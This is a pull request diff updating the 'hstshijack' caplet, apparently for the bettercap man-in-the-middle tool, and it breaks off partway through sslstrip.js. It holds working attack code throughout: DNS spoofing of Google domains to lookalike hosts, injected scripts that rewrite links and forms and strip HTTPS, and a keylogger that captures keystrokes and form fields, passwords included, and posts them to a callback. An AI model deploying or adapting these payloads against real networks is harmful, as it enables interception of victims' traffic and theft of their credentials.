### PR TITLE
update hstshijack

### DIFF
--- a/hstshijack/hstshijack.cap
+++ b/hstshijack/hstshijack.cap
@@ -2,20 +2,20 @@
 
 # Domains assigned to 'hstshijack.targets', 'hstshijack.blockscripts' and 'hstshijack.payloads'
 # variables get precendence over those assigned to the 'hstshijack.ignore' variable.
-set hstshijack.targets         *.google.com, google.com, gstatic.com, *.gstatic.com
-set hstshijack.replacements    *.google.corn,google.corn,gstatic.corn,*.gstatic.corn
+set hstshijack.targets         google.com, *.google.com, gstatic.com, *.gstatic.com
+set hstshijack.replacements    google.corn,*.google.corn,gstatic.corn,*.gstatic.corn
 set hstshijack.ssl.domains     /usr/local/share/bettercap/caplets/hstshijack/domains.txt
 set hstshijack.ssl.index       /usr/local/share/bettercap/caplets/hstshijack/index.json
 set hstshijack.ssl.check       true
 #set hstshijack.blockscripts    example.com,*.example.com
 set hstshijack.obfuscate       true
-set hstshijack.payloads        *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js
-#set hstshijack.ignore          *
+set hstshijack.payloads        *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*.google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google-search.js,google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google-search.js
+set hstshijack.ignore          captive.apple.com,connectivitycheck.gstatic.com,detectportal.firefox.com,www.msftconnecttest.com
 
 set http.proxy.script  /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js
 http.proxy on
 
-set dns.spoof.domains  *.google.corn,google.corn,gstatic.corn,*.gstatic.corn
+set dns.spoof.domains  google.corn,*.google.corn,gstatic.corn,*.gstatic.corn
 set dns.spoof.all      true
 dns.spoof on
 

--- a/hstshijack/payloads/google-search.js
+++ b/hstshijack/payloads/google-search.js
@@ -1,0 +1,23 @@
+globalThis.addEventListener("DOMContentLoaded", function(){
+  "use strict";
+
+  if (location.pathname === "/search") {
+    document.querySelectorAll("a").forEach(function(obf_var_link){
+      if (obf_var_link.href && obf_var_link.href !== "") {
+        var obf_var_container = document.createElement("obf_dummy");
+        obf_var_container.append(obf_var_link.cloneNode(true))
+        obf_var_container.addEventListener("click", function(e){
+          e.preventDefault();
+          location.href = obf_var_link.href;
+        });
+        obf_var_link.before(obf_var_container);
+        obf_var_link.remove();
+      }
+    });
+  }
+
+  var obf_var_stylesheet = document.createElement("style");
+  obf_var_stylesheet.innerText = `.gb_Pa{box-shadow:none}`;
+  document.body.append(obf_var_stylesheet);
+});
+

--- a/hstshijack/payloads/hijack.js
+++ b/hstshijack/payloads/hijack.js
@@ -1,5 +1,5 @@
 /*
-  Hooks XMLHttpRequest as well as 'a', 'form', 'script' & 'iframe' nodes.
+  Hooks XMLHttpRequest as well as 'a', 'form', 'script' and 'iframe' nodes.
   This payload is essential for hostname replacements.
 
   Remember that any occurrence of 'obf_path_ssl_log', 'obf_path_callback' and
@@ -8,159 +8,126 @@
   are already declared before this is injected.
 */
 
-var obf_func_open = XMLHttpRequest.prototype.open,
-    obf_var_XMLHttpRequest = new XMLHttpRequest(),
-    obf_var_callback_log = [];
+(function(){
+  "use strict";
 
-function obf_func_toWholeRegexpSet(obf_var_selector_string, obf_var_replacement_string) {
-  if (obf_var_selector_string.indexOf("*") != -1) {
-    obf_var_selector_string = obf_var_selector_string.replace(/\-/g, "\\-");
-    if (obf_var_selector_string.match(/^\*./)) {
-      obf_var_selector_string = obf_var_selector_string.replace(/^\*\./, "((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)");
-      obf_var_selector_string = obf_var_selector_string.replace(/\./g, "\\.");
-      obf_var_replacement_string = obf_var_replacement_string.replace(/^\*\./, "");
-      return [
-        new RegExp("^" + obf_var_selector_string + "$", "ig"),
-        "$1" + obf_var_replacement_string
-      ];
-    } else if (obf_var_selector_string.match(/\.\*$/)) {
-      obf_var_selector_string = obf_var_selector_string.replace(/\.\*/g, "((?:.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)");
-      obf_var_selector_string = obf_var_selector_string.replace(/\./g, "\\.");
-      obf_var_replacement_string = obf_var_replacement_string.replace(/\.\*$/, "");
-      return [
-        new RegExp(obf_var_selector_string, "ig"),
-        obf_var_replacement_string + "$1"
-      ];
-    }
-  } else {
-    obf_var_selector_string = obf_var_selector_string.replace(/\./g, "\\.");
-    obf_var_selector_string = obf_var_selector_string.replace(/\-/g, "\\-");
-    return [
-      new RegExp("^" + obf_var_selector_string + "$", "ig"),
-      obf_var_replacement_string
-    ];
-  }
-}
+  var obf_var_regex_one = /\-/g,
+    obf_var_regex_two = /^\*./,
+    obf_var_regex_three = /^\*\./,
+    obf_var_regex_four = /\./g,
+    obf_var_regex_five = /^\*\./,
+    obf_var_regex_six = /\.\*$/,
+    obf_var_regex_seven = /\.\*/g;
 
-function obf_func_parseURL(obf_var_url) {
-  obf_var_strippedURL = obf_var_url.replace(/^\s*(.*)\s*$/g, "$1");
-  obf_var_retval = ["","","","","",""];
-  if (obf_var_strippedURL.match(/^((?:\w+:)?\/\/).*$/i)) {
-    obf_var_retval[0] = obf_var_strippedURL.replace(/^((?:\w+:)?\/\/).*$/i, "$1");
-  }
-  if (obf_var_strippedURL.match(/^(?:(?:(?:\w+:)?\/\/)((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)(?:[/][^/].*$|[/]$|[?#].*$|$)/i)) {
-    obf_var_retval[1] = obf_var_strippedURL.replace(/^(?:(?:(?:\w+:)?\/\/)((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)(?:[/][^/].*$|[/]$|[?#].*$|$)/i, "$1");
-  }
-  if (obf_var_strippedURL.match(/^(?:(?:(?:\w+:)?\/\/)?(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))([:][1-9][0-9]{0,4}).*/i)) {
-    obf_var_retval[2] = obf_var_strippedURL.replace(/^(?:(?:(?:\w+:)?\/\/)?(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))([:][1-9][0-9]{0,4}).*$/i, "$1");
-  }
-  if (obf_var_strippedURL.match(/^(?:(?:\w+:)?\/\/(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)?([/][^?#]*).*/i)) {
-    obf_var_retval[3] = obf_var_strippedURL.replace(/^(?:(?:\w+:)?\/\/)?[^/?#]*([/][^?#]*).*$/i, "$1");
-  }
-  if (obf_var_strippedURL.match(/^.*?([?][^#]*).*/i)) {
-    obf_var_retval[4] = obf_var_strippedURL.replace(/^.*?([?][^#]*).*$/i, "$1");
-  }
-  if (obf_var_strippedURL.match(/^[^#]*([#].*)/i)) {
-    obf_var_retval[5] = obf_var_strippedURL.replace(/^[^#]*([#].*)/i, "$1");
-  }
-  return obf_var_retval;
-}
+  globalThis.addEventListener("DOMContentLoaded", function(){
+    "use strict";
 
-function obf_func_callback(obf_var_host) {
-  for (
-    obf_var_i = 0;
-    obf_var_i < obf_var_callback_log.length;
-    obf_var_i++
-  ) {
-    if (obf_var_callback_log[i] == obf_var_host) {
-      return;
-    }
-  }
-  obf_var_callback_log.push(obf_var_host);
-  obf_var_req = obf_var_XMLHttpRequest;
-  obf_var_req.open(
-    "GET",
-    "http://" + location.host + "/obf_path_ssl_log?" + obf_var_host,
-    true);
-  obf_var_req.send();
-}
+    var obf_func_open = XMLHttpRequest.prototype.open,
+        obf_var_XMLHttpRequest = new XMLHttpRequest(),
+        obf_var_callback_log = [];
 
-function obf_func_hijack(obf_var_host) {
-  for (
-    obf_var_i = 0;
-    obf_var_i < obf_var_target_hosts.length;
-    obf_var_i++
-  ) {
-    obf_var_whole_regexp_set = obf_func_toWholeRegexpSet(
-      obf_var_target_hosts[obf_var_i],
-      obf_var_replacement_hosts[obf_var_i]);
-    if (obf_var_host.match(obf_var_whole_regexp_set[0])) {
-      obf_var_host = obf_var_host.replace(
-        obf_var_whole_regexp_set[0],
-        obf_var_whole_regexp_set[1]);
-      break;
-    }
-  }
-  return obf_var_host;
-}
-
-function obf_func_hook_XMLHttpRequest() {
-  XMLHttpRequest.prototype.open = function(
-    obf_var_method,
-    obf_var_url,
-    obf_var_async,
-    obf_var_username,
-    obf_var_password
-  ) {
-    obf_var_parsed_url = obf_func_parseURL(obf_var_url);
-    obf_var_hijacked_host = obf_func_hijack(obf_var_parsed_url[1]);
-    if (obf_var_hijacked_host != obf_var_parsed_url[1]) {
-      if (obf_var_parsed_url[0].toLowerCase() === "https://") {
-        obf_var_parsed_url[0] = obf_var_parsed_url[0].replace(/(http)s:\/\//i, "$1://");
-      }
-      if (obf_var_parsed_url[2] === ":443") {
-        obf_var_parsed_url[2] = "";
+    function obf_func_toWholeRegexpSet(obf_var_selector_string, obf_var_replacement_string) {
+      if (obf_var_selector_string.indexOf("*") != -1) {
+        obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_one, "\\-");
+        if (obf_var_selector_string.match(obf_var_regex_two)) {
+          var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_three, "((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)"),
+              obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."),
+              obf_var_replacement_string = obf_var_replacement_string.replace(obf_var_regex_five, "");
+          return [
+            new RegExp("^" + obf_var_selector_string + "$", "ig"),
+            "$1" + obf_var_replacement_string
+          ];
+        } else if (obf_var_selector_string.match(obf_var_regex_six)) {
+          var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_seven, "((?:.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)"),
+              obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."),
+              obf_var_replacement_string = obf_var_replacement_string.replace(obf_var_regex_six, "");
+          return [
+            new RegExp(obf_var_selector_string, "ig"),
+            obf_var_replacement_string + "$1"
+          ];
+        }
+      } else {
+        var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."),
+            obf_var_selector_string = obf_var_selector_string.replace(/\-/g, "\\-");
+        return [
+          new RegExp("^" + obf_var_selector_string + "$", "ig"),
+          obf_var_replacement_string
+        ];
       }
     }
-    obf_var_url = obf_var_parsed_url[0] +
-      obf_var_hijacked_host +
-      obf_var_parsed_url[2] +
-      obf_var_parsed_url[3] +
-      obf_var_parsed_url[4] +
-      obf_var_parsed_url[5];
-    return obf_func_open.apply(this, arguments);
-  }
-}
 
-function obf_func_hook_nodes() {
-  document.querySelectorAll("a,form,script,iframe").forEach(function(obf_var_node){
-    try {
-      obf_var_url = "";
-      switch (obf_var_node.tagName) {
-        case "A":
-          obf_var_node.href
-            ? obf_var_url = obf_var_node.href
-            : "";
-          break;
-        case "FORM":
-          obf_var_node.action
-            ? obf_var_url = obf_var_node.action
-            : "";
-          break;
-        case "SCRIPT":
-          obf_var_node.src
-            ? obf_var_url = obf_var_node.src
-            : "";
-          break;
-        case "IFRAME":
-          obf_var_node.src
-            ? obf_var_url = obf_var_node.src
-            : "";
-          break;
+    function obf_func_parseURL(obf_var_url) {
+      var obf_var_strippedURL = obf_var_url.replace(/^\s*(.*)\s*$/g, "$1"),
+          obf_var_retval = ["","","","","",""];
+      if (obf_var_strippedURL.match(/^((?:\w+:)?\/\/).*$/i)) {
+        obf_var_retval[0] = obf_var_strippedURL.replace(/^((?:\w+:)?\/\/).*$/i, "$1");
       }
-      if (obf_var_url.match(/^\s*(?:http[s]?:)?\/\/[^:/?#]+/i)) {
-        obf_var_parsed_url = obf_func_parseURL(obf_var_url);
-        obf_var_hijacked_host = obf_func_hijack(obf_var_parsed_url[1]);
+      if (obf_var_strippedURL.match(/^(?:(?:(?:\w+:)?\/\/)((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)(?:[/][^/].*$|[/]$|[?#].*$|$)/i)) {
+        obf_var_retval[1] = obf_var_strippedURL.replace(/^(?:(?:(?:\w+:)?\/\/)((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)(?:[/][^/].*$|[/]$|[?#].*$|$)/i, "$1");
+      }
+      if (obf_var_strippedURL.match(/^(?:(?:(?:\w+:)?\/\/)?(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))([:][1-9][0-9]{0,4}).*/i)) {
+        obf_var_retval[2] = obf_var_strippedURL.replace(/^(?:(?:(?:\w+:)?\/\/)?(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))([:][1-9][0-9]{0,4}).*$/i, "$1");
+      }
+      if (obf_var_strippedURL.match(/^(?:(?:\w+:)?\/\/(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)?([/][^?#]*).*/i)) {
+        obf_var_retval[3] = obf_var_strippedURL.replace(/^(?:(?:\w+:)?\/\/)?[^/?#]*([/][^?#]*).*$/i, "$1");
+      }
+      if (obf_var_strippedURL.match(/^.*?([?][^#]*).*/i)) {
+        obf_var_retval[4] = obf_var_strippedURL.replace(/^.*?([?][^#]*).*$/i, "$1");
+      }
+      if (obf_var_strippedURL.match(/^[^#]*([#].*)/i)) {
+        obf_var_retval[5] = obf_var_strippedURL.replace(/^[^#]*([#].*)/i, "$1");
+      }
+      return obf_var_retval;
+    }
+
+    function obf_func_callback(obf_var_host) {
+      for (
+        var obf_var_i = 0;
+        obf_var_i < obf_var_callback_log.length;
+        obf_var_i++
+      ) {
+        if (obf_var_callback_log[i] == obf_var_host) {
+          return;
+        }
+      }
+      obf_var_callback_log.push(obf_var_host);
+      var obf_var_req = obf_var_XMLHttpRequest;
+      obf_var_req.open(
+        "GET",
+        "http://obf_random_host/obf_path_ssl_log?" + obf_var_host,
+        true);
+      obf_var_req.send();
+    }
+
+    function obf_func_hijack(obf_var_host) {
+      for (
+        var obf_var_i = 0;
+        obf_var_i < obf_var_target_hosts.length;
+        obf_var_i++
+      ) {
+        var obf_var_whole_regexp_set = obf_func_toWholeRegexpSet(
+          obf_var_target_hosts[obf_var_i],
+          obf_var_replacement_hosts[obf_var_i]);
+        if (obf_var_host.match(obf_var_whole_regexp_set[0])) {
+          obf_var_host = obf_var_host.replace(
+            obf_var_whole_regexp_set[0],
+            obf_var_whole_regexp_set[1]);
+          break;
+        }
+      }
+      return obf_var_host;
+    }
+
+    function obf_func_hook_XMLHttpRequest() {
+      XMLHttpRequest.prototype.open = function(
+        obf_var_method,
+        obf_var_url,
+        obf_var_async,
+        obf_var_username,
+        obf_var_password
+      ) {
+        var obf_var_parsed_url = obf_func_parseURL(obf_var_url),
+            obf_var_hijacked_host = obf_func_hijack(obf_var_parsed_url[1]);
         if (obf_var_hijacked_host != obf_var_parsed_url[1]) {
           if (obf_var_parsed_url[0].toLowerCase() === "https://") {
             obf_var_parsed_url[0] = obf_var_parsed_url[0].replace(/(http)s:\/\//i, "$1://");
@@ -169,54 +136,99 @@ function obf_func_hook_nodes() {
             obf_var_parsed_url[2] = "";
           }
         }
-        obf_var_hijacked_url = obf_var_parsed_url[0] +
+        obf_var_url = obf_var_parsed_url[0] +
           obf_var_hijacked_host +
           obf_var_parsed_url[2] +
           obf_var_parsed_url[3] +
           obf_var_parsed_url[4] +
           obf_var_parsed_url[5];
-        switch (obf_var_node.tagName) {
-          case "A":
-            if (obf_var_node.href) {
-              obf_var_node.href = obf_var_hijacked_url;
-            }
-            break;
-          case "FORM":
-            if (obf_var_node.action) {
-              obf_var_node.action = obf_var_hijacked_url;
-            }
-            break;
-          case "SCRIPT":
-            if (obf_var_node.src) {
-              obf_var_node.src = obf_var_hijacked_url;
-            }
-            break;
-          case "IFRAME":
-            if (obf_var_node.src) {
-              obf_var_node.src = obf_var_hijacked_url;
-            }
-            break;
-        }
-        obf_func_callback(obf_var_parsed_url[1].toLowerCase());
+        return obf_func_open.apply(this, arguments);
       }
+    }
+
+    function obf_func_hook_nodes() {
+      document.querySelectorAll("a,form,script,iframe").forEach(function(obf_var_node){
+        try {
+          var obf_var_url = "";
+          switch (obf_var_node.tagName) {
+            case "A":
+              obf_var_node.href
+                ? obf_var_url = obf_var_node.href
+                : "";
+              break;
+            case "FORM":
+              obf_var_node.action
+                ? obf_var_url = obf_var_node.action
+                : "";
+              break;
+            case "SCRIPT":
+              obf_var_node.src
+                ? obf_var_url = obf_var_node.src
+                : "";
+              break;
+            case "IFRAME":
+              obf_var_node.src
+                ? obf_var_url = obf_var_node.src
+                : "";
+              break;
+          }
+          if (obf_var_url.match(/^\s*(?:http[s]?:)?\/\/[^:/?#]+/i)) {
+            var obf_var_parsed_url = obf_func_parseURL(obf_var_url),
+                obf_var_hijacked_host = obf_func_hijack(obf_var_parsed_url[1]);
+            if (obf_var_hijacked_host != obf_var_parsed_url[1]) {
+              if (obf_var_parsed_url[0].toLowerCase() === "https://") {
+                obf_var_parsed_url[0] = obf_var_parsed_url[0].replace(/(http)s:\/\//i, "$1://");
+              }
+              if (obf_var_parsed_url[2] === ":443") {
+                obf_var_parsed_url[2] = "";
+              }
+            }
+            var obf_var_hijacked_url = obf_var_parsed_url[0] +
+              obf_var_hijacked_host +
+              obf_var_parsed_url[2] +
+              obf_var_parsed_url[3] +
+              obf_var_parsed_url[4] +
+              obf_var_parsed_url[5];
+            switch (obf_var_node.tagName) {
+              case "A":
+                if (obf_var_node.href) {
+                  obf_var_node.href = obf_var_hijacked_url;
+                }
+                break;
+              case "FORM":
+                if (obf_var_node.action) {
+                  obf_var_node.action = obf_var_hijacked_url;
+                }
+                break;
+              case "SCRIPT":
+                if (obf_var_node.src) {
+                  obf_var_node.src = obf_var_hijacked_url;
+                }
+                break;
+              case "IFRAME":
+                if (obf_var_node.src) {
+                  obf_var_node.src = obf_var_hijacked_url;
+                }
+                break;
+            }
+            obf_func_callback(obf_var_parsed_url[1].toLowerCase());
+          }
+        } catch(obf_var_ignore) {}
+      });
+    }
+
+    try {
+      obf_func_hook_XMLHttpRequest();
+    } catch(obf_var_ignore) {}
+
+    try {
+      setInterval(obf_func_hook_nodes, 2000);
+      obf_func_hook_nodes();
+    } catch(obf_var_ignore) {}
+
+    try {
+      globalThis.addEventListener("load", obf_func_hook_nodes);
     } catch(obf_var_ignore) {}
   });
-}
-
-try {
-  obf_func_hook_XMLHttpRequest();
-} catch(obf_var_ignore) {}
-
-try {
-  setInterval(obf_func_hook_nodes, 2000);
-  obf_func_hook_nodes();
-} catch(obf_var_ignore) {}
-
-try {
-  globalThis.addEventListener("load", obf_func_hook_nodes);
-} catch(obf_var_ignore) {}
-
-try {
-  document.addEventListener("DOMContentLoaded", obf_func_hook_nodes);
-} catch(obf_var_ignore) {}
+})();
 

--- a/hstshijack/payloads/keylogger.js
+++ b/hstshijack/payloads/keylogger.js
@@ -7,128 +7,135 @@
   are already declared before this is injected.
 */
 
-function obf_func_random_string(obf_var_length) {
-  var obf_var_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
-      obf_var_buff  = new Array(obf_var_length);
-  for (obf_var_i = 0; obf_var_i < obf_var_length; obf_var_i++) {
-    obf_var_buff[obf_var_i] = obf_var_chars.charAt(parseInt(Math.random() * obf_var_chars.length));
+
+(function(){
+  "use strict";
+
+  var obf_var_keystrokes = [];
+
+  function obf_func_random_string(obf_var_length) {
+    var obf_var_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
+        obf_var_buff  = new Array(obf_var_length);
+    for (var obf_var_i = 0; obf_var_i < obf_var_length; obf_var_i++) {
+      obf_var_buff[obf_var_i] = obf_var_chars.charAt(parseInt(Math.random() * obf_var_chars.length));
+    }
+    return obf_var_buff.join("");
   }
-  return obf_var_buff.join("");
-}
 
-function obf_func_callback() {
-  try {
-    obf_var_inputs = document.getElementsByTagName("input");
-    obf_var_textareas = document.getElementsByTagName("textarea");
-    obf_var_params = "";
-
-    for (obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) {
-      if (obf_var_inputs[obf_var_i].value != "") {
-        obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) +
-          "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) +
-          (obf_var_i < (obf_var_inputs.length-1) ? "&" : "");
-      }
-    }
-    for (obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) {
-      if (obf_var_textareas[obf_var_i].value != "") {
-        obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) +
-          "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) +
-          (obf_var_i < (obf_var_textareas.length-1) ? "&" : "");
-      }
-    }
-
-    if (obf_var_params.length > 0) {
-      obf_var_req = new XMLHttpRequest();
-      obf_var_req.open(
-        "POST",
-        "http://" + location.host + "obf_path_callback?" + obf_var_params,
-        true);
-      obf_var_req.send();
-    }
-  } catch(obf_var_ignore){}
-}
-
-function obf_func_callback_whitelist() {
-  try {
-    obf_var_inputs = document.getElementsByTagName("input");
-    obf_var_textareas = document.getElementsByTagName("textarea");
-    obf_var_params = "";
-
-    for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) {
-      if (obf_var_inputs[obf_var_i].value != "") {
-        obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) +
-          "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) +
-          (obf_var_i < (obf_var_inputs.length-1) ? "&" : "");
-      }
-    }
-    for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) {
-      if (obf_var_textareas[obf_var_i].value != "") {
-        obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) +
-          "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) +
-          (obf_var_i < (obf_var_textareas.length-1) ? "&" : "");
-      }
-    }
-
-    if (obf_var_params.length > 0) {
-      obf_var_req = new XMLHttpRequest();
-      obf_var_req.open(
-        "POST",
-        "http://" + location.host + "obf_path_whitelist?" + obf_var_params,
-        true);
-      obf_var_req.send();
-    }
-  } catch(obf_var_ignore){}
-}
-
-function obf_func_hook_keyup() {
-  globalThis.addEventListener("keyup", function(obf_var_event) {
+  function obf_func_callback() {
     try {
-      if (obf_var_event.target.tagName.match(/INPUT|TEXTAREA/)) {
-        obf_func_callback();
+      var obf_var_inputs = document.getElementsByTagName("input"),
+          obf_var_textareas = document.getElementsByTagName("textarea"),
+          obf_var_params = "";
+
+      for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) {
+        if (obf_var_inputs[obf_var_i].value != "") {
+          obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) +
+            "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) +
+            (obf_var_i < (obf_var_inputs.length-1) ? "&" : "");
+        }
+      }
+      for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) {
+        if (obf_var_textareas[obf_var_i].value != "") {
+          obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) +
+            "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) +
+            (obf_var_i < (obf_var_textareas.length-1) ? "&" : "");
+        }
+      }
+      if (obf_var_params !== "") {
+        obf_var_params += "&";
+      }
+      obf_var_params += "obf_var_keystrokes=" + encodeURIComponent(obf_var_keystrokes.join(","));
+
+      if (obf_var_params.length > 0) {
+        var obf_var_req = new XMLHttpRequest();
+        obf_var_req.open(
+          "POST",
+          "http://" + location.host + "obf_path_callback?" + obf_var_params,
+          true);
+        obf_var_req.send();
       }
     } catch(obf_var_ignore){}
-  });
-}
+  }
 
-function obf_func_hook_forms() {
-  document.querySelectorAll("form").forEach(function(obf_var_form){
-    if (obf_var_form.querySelector("input[type=password]")) {
-      obf_var_form.addEventListener("submit", obf_func_callback_whitelist);
-    } else {
-      obf_var_form.addEventListener("submit", obf_func_callback);
-    }
-  });
-}
+  function obf_func_callback_whitelist() {
+    try {
+      var obf_var_inputs = document.getElementsByTagName("input"),
+          obf_var_textareas = document.getElementsByTagName("textarea"),
+          obf_var_params = "";
 
-function obf_func_hook_inputs() {
-  document.querySelectorAll("input").forEach(function(obf_var_input){
-    obf_var_input.autocomplete = "off";
-  });
-}
+      for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) {
+        if (obf_var_inputs[obf_var_i].value != "") {
+          obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) +
+            "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) +
+            (obf_var_i < (obf_var_inputs.length-1) ? "&" : "");
+        }
+      }
+      for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) {
+        if (obf_var_textareas[obf_var_i].value != "") {
+          obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) +
+            "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) +
+            (obf_var_i < (obf_var_textareas.length-1) ? "&" : "");
+        }
+      }
 
-obf_var_hooked_tag = obf_func_random_string(parseInt(8 + Math.random() * 8));
+      if (obf_var_params.length > 0) {
+        var obf_var_req = new XMLHttpRequest();
+        obf_var_req.open(
+          "POST",
+          "http://" + location.host + "obf_path_whitelist?" + obf_var_params,
+          true);
+        obf_var_req.send();
+      }
+    } catch(obf_var_ignore){}
+  }
 
-try {
-  obf_func_hook_keyup();
-} catch(obf_var_ignore){}
+  function obf_func_hook_keyup() {
+    globalThis.addEventListener("keydown", function(obf_var_event) {
+      try {
+        obf_var_keystrokes.push(obf_var_event.key);
+        obf_func_callback();
+      } catch(obf_var_ignore){}
+    });
+  }
 
-try {
-  obf_func_hook_forms();
-} catch(obf_var_ignore){}
+  function obf_func_hook_forms() {
+    document.querySelectorAll("form").forEach(function(obf_var_form){
+  //    if (obf_var_form.querySelector("input[type=password]")) {
+  //      obf_var_form.addEventListener("submit", obf_func_callback_whitelist);
+  //    } else {
+        obf_var_form.addEventListener("submit", obf_func_callback);
+  //    }
+    });
+  }
 
-try {
-  obf_func_hook_inputs();
-} catch(obf_var_ignore){}
+  function obf_func_hook_inputs() {
+    document.querySelectorAll("input").forEach(function(obf_var_input){
+      obf_var_input.autocomplete = "off";
+    });
+  }
 
-try {
-  document.addEventListener("DOMContentLoaded", obf_func_hook_forms);
-  document.addEventListener("DOMContentLoaded", obf_func_hook_inputs);
-} catch(obf_var_ignore) {}
+  var obf_var_hooked_tag = obf_func_random_string(parseInt(8 + Math.random() * 8));
 
-try {
-  globalThis.addEventListener("load", obf_func_hook_forms);
-  globalThis.addEventListener("load", obf_func_hook_inputs);
-  setInterval(obf_func_hook_forms, 2000);
-  setInterval(obf_func_hook_inputs, 2000);
-} catch(obf_var_ignore){}
+  try {
+    obf_func_hook_keyup();
+  } catch(obf_var_ignore){}
+
+  try {
+    obf_func_hook_forms();
+  } catch(obf_var_ignore){}
+
+  try {
+    obf_func_hook_inputs();
+  } catch(obf_var_ignore){}
+
+  try {
+    globalThis.addEventListener("DOMContentLoaded", obf_func_hook_forms);
+    globalThis.addEventListener("DOMContentLoaded", obf_func_hook_inputs);
+    globalThis.addEventListener("load", obf_func_hook_forms);
+    globalThis.addEventListener("load", obf_func_hook_inputs);
+    setInterval(obf_func_hook_forms, 2000);
+    setInterval(obf_func_hook_inputs, 2000);
+  } catch(obf_var_ignore){}
+})();
 

--- a/hstshijack/payloads/sslstrip.js
+++ b/hstshijack/payloads/sslstrip.js
@@ -7,62 +7,66 @@
   are already declared before this is injected.
 */
 
-var obf_func_open = XMLHttpRequest.prototype.open;
+(function(){
+  "use strict";
 
-function obf_func_hook_XMLHttpRequest() {
-  XMLHttpRequest.prototype.open = function(
-    obf_var_method,
-    obf_var_url,
-    obf_var_async,
-    obf_var_username,
-    obf_var_password
-  ) {
-    obf_var_url = obf_var_url.replace(/(http)s/ig, "$1");
-    return obf_func_open.apply(this, arguments);
+  var obf_func_open = XMLHttpRequest.prototype.open;
+
+  function obf_func_hook_XMLHttpRequest() {
+    XMLHttpRequest.prototype.open = function(
+      obf_var_method,
+      obf_var_url,
+      obf_var_async,
+      obf_var_username,
+      obf_var_password
+    ) {
+      var obf_var_url = obf_var_url.replace(/(http)s/ig, "$1");
+      return obf_func_open.apply(this, arguments);
+    }
   }
-}
 
-function obf_func_hook_nodes() {
-  document.querySelectorAll("a,iframe,script,form").forEach(function(obf_var_node){
-    try {
-      switch (obf_var_node.tagName) {
-        case "A":
-          if (obf_var_node.href && obf_var_node.href.match(/^\s*https:/i)) {
-            obf_var_node.href = obf_var_node.href.replace(/(http)s/i, "$1");
-          }
-          break;
-        case "IFRAME":
-          if (obf_var_node.src && obf_var_node.src.match(/^\s*https:/i)) {
-            obf_var_node.src = obf_var_node.src.replace(/(http)s/i, "$1");
-          }
-          break;
-        case "SCRIPT":
-          if (obf_var_node.src && obf_var_node.src.match(/^\s*https:/i)) {
-            obf_var_node.src = obf_var_node.src.replace(/(http)s/i, "$1");
-          }
-          break;
-        case "FORM":
